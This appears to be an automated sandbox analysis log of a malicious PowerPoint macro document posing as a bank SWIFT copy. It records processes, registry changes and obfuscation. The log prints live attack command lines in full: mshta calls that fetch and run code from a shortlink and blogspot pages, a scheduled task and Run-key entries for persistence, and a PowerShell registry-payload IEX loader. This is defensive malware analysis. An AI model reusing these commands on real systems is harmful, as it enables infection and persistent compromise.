              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 29_2_001E5408
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 29_2_001E5750
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_02A018A8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_02A074B7
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_02A01897
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_02A074C8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_02A0618D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_02A01538
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_02A01548
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_02AE1BE2
              Source: BankSwiftCopyUSD95000.pptOLE, VBA macro line: Sub Auto_Close()
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function Auto_Close
              Source: BankSwiftCopyUSD95000.pptOLE indicator, VBA macros: true
              Source: BankSwiftCopyUSD95000.pptOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: 29.2.MSBuild.exe.400000.2.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: 29.2.MSBuild.exe.400000.2.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: mshta.exe, 00000006.00000002.2277240561.0000000003D50000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
              Source: classification engineClassification label: mal100.troj.expl.evad.winPPT@46/51@29/5
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_003FACEE AdjustTokenPrivileges,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_003FACB7 AdjustTokenPrivileges,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_01D9ACEE AdjustTokenPrivileges,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_01D9ACB7 AdjustTokenPrivileges,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_01CEACEE AdjustTokenPrivileges,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_01CEACB7 AdjustTokenPrivileges,
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\BankSwiftCopyUSD95000.LNK
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC735.tmp
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................x.x...............x...............x.......x.....
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................x.x.............................X.'.......x.....
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................x.x...............x.......................x.....
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................6.......................x.x.............................X.'.......x.....
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................?.......................x.x...............x.......................x.....
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............................S.......................x.x.....#.......................X.'.......x.....
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............................\.......................x.x.....#.........x.......................x.....
              Source: C:\Windows\System32\schtasks.exeConsole Write: .................................................v-.............................................................................................
              Source: C:\Windows\System32\taskkill.exeConsole Write: ................................................d1......................L...............d...............................X.......B.........3.....
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................l.......T.......................................................................
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................h.......v.......................................................x...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................h...............................................................................
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................h...............................................................x...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................h...............................................................................
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................d.......................................#.......................x...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................d.......................................#.......................................
              Source: C:\Windows\System32\taskkill.exeConsole Write: ................................................d1......................................b...............................T.......B.........'.....
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................P.z.......................%.....P.z.......%....... .....`I"........v.....................K).......Y.............................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v....8.p.....0...............................................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j..... ..............................}..v......p.....0.................Y.............................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v......p.....0...............................................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....x.Y.............................}..v....0.p.....0.................Y.............................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j....................................}..v....0.q.....0...............................................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j....(.Y.............................}..v......q.....0.................Y.............................
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............`.......|.......G.......................................X...............................
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............`.......|.......h.......................................................X...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............`.......|.......q.......................................X...............................
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............`.......|...............................................................X...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............`.......................................................X...............................
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............`...............................................#.......................X...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............`...............................................#.......X...............................
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
              Source: C:\Windows\System32\PING.EXEWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
              Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "winword.exe")
              Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EXCEL.exe")
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEFile read: C:\Users\desktop.ini
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: BankSwiftCopyUSD95000.pptVirustotal: Detection: 34%
              Source: BankSwiftCopyUSD95000.pptReversingLabs: Detection: 21%
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' /AUTOMATION -Embedding
              Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt'
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt'
              Source: unknownProcess created: C:\Windows\System32\PING.EXE ping.exe
              Source: unknownProcess created: C:\Windows\System32\mshta.exe mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv
              Source: unknownProcess created: C:\Windows\System32\PING.EXE ping.exe
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX
              Source: unknownProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')
              Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {2ABF5983-E6CF-46DC-B95A-53E1F6F4D156} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
              Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://randikhanaekminar.blogspot.com/p/st2.html'', 0 : window.close')
              Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://randikhanaekminar.blogspot.com/p/st2.html
              Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe
              Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''powershell ((gp HKCU:\Software).meather)|IEX'', 0 : window.close')
              Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im winword.exe
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX
              Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EXCEL.exe
              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).meather)|IEX
              Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://backbones1234511a.blogspot.com/p/stback1.html'', 0 : window.close')
              Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://backbones1234511a.blogspot.com/p/stback1.html
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX
              Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://startthepartyup.blogspot.com/p/backbone14.html'', 0 : window.close')
              Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://startthepartyup.blogspot.com/p/backbone14.html
              Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://ghostbackbone123.blogspot.com/p/ghostbackup13.html'', 0 : window.close')
              Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://ghostbackbone123.blogspot.com/p/ghostbackup13.html
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt'
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess created: C:\Windows\System32\PING.EXE ping.exe
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess created: C:\Windows\System32\mshta.exe mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess created: C:\Windows\System32\PING.EXE ping.exe
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\System32\taskeng.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://randikhanaekminar.blogspot.com/p/st2.html'', 0 : window.close')
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://randikhanaekminar.blogspot.com/p/st2.html
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im winword.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EXCEL.exe
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).meather)|IEX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://backbones1234511a.blogspot.com/p/stback1.html
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://startthepartyup.blogspot.com/p/backbone14.html
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://ghostbackbone123.blogspot.com/p/ghostbackup13.html
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\PowerPoint\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: Managament.inf.pdb source: powershell.exe, 0000000C.00000002.2287134514.0000000006951000.00000004.00000001.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 0000000C.00000002.2254678756.0000000002B60000.00000002.00000001.sdmp
Source: BankSwiftCopyUSD95000.ppt Initial sample: OLE document summary bytes = 0
Source: BankSwiftCopyUSD95000.ppt Initial sample: OLE document summary hiddenslides = 0
Source: BankSwiftCopyUSD95000.ppt Initial sample: OLE document summary mmclips = 0
Source: BankSwiftCopyUSD95000.ppt Initial sample: OLE document summary notes = 0
Source: BankSwiftCopyUSD95000.ppt Initial sample: OLE document summary presentationtarget = Widescreen
Source: BankSwiftCopyUSD95000.ppt Initial sample: OLE document summary slides = 0

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: BankSwiftCopyUSD95000.ppt Stream path 'VBA/Module1' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Module1
Document contains an embedded VBA with many randomly named variables
Source: BankSwiftCopyUSD95000.ppt Stream path 'VBA/Module1' : High entropy of concatenated variable names
Yara detected Costura Assembly Loader
Source: Yara match File source: Process Memory Space: powershell.exe PID: 2816, type: MEMORY
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_0040921A pushad ; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_004091D2 push eax; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_05640450 push eax; mov dword ptr [esp], ecx
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_01E591D2 push eax; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_01E5921A pushad ; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_0571017C push 000000C3h; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_0571045C push eax; mov dword ptr [esp], ecx
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_05791A57 push 6E7FC374h; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_05791B93 push 6E7FC3C4h; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CEA1A8 push DCBDC399h; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF61FF push ebx; iretd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF61FD push ecx; iretd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF61F9 push eax; iretd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF5DA4 push eax; retn 0074h
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF5557 push ebp; iretd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF5554 push ebp; iretd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF5578 push eax; retn 0074h
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF6908 push eax; retn 0074h
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF2C9C push eax; retn 0074h
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF5098 push eax; retn 0074h
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF58B0 push eax; retn 0074h
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF6868 push edi; iretd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF5077 push eax; iretd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF5075 push eax; iretd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF43E8 push edi; iretd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF43E0 push edi; iretd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF4388 push edi; iretd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF4F91 push eax; iretd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF4FB0 push eax; retn 0074h
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF5354 push eax; retn 0074h

Boot Survival:

Creates an autostart registry key pointing to binary in C:\Windows
Source: C:\Windows\System32\mshta.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run checkmatebaby
Creates autostart registry keys with suspicious values (likely registry only malware)
Source: C:\Windows\System32\mshta.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run mithuiki mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell ((gp HKCU:\Software).meather)|IEX"", 0 : window.close")
Source: C:\Windows\System32\mshta.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run checkmatebaby mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""mshta https://backbones1234511a.blogspot.com/p/stback1.html"", 0 : window.close")
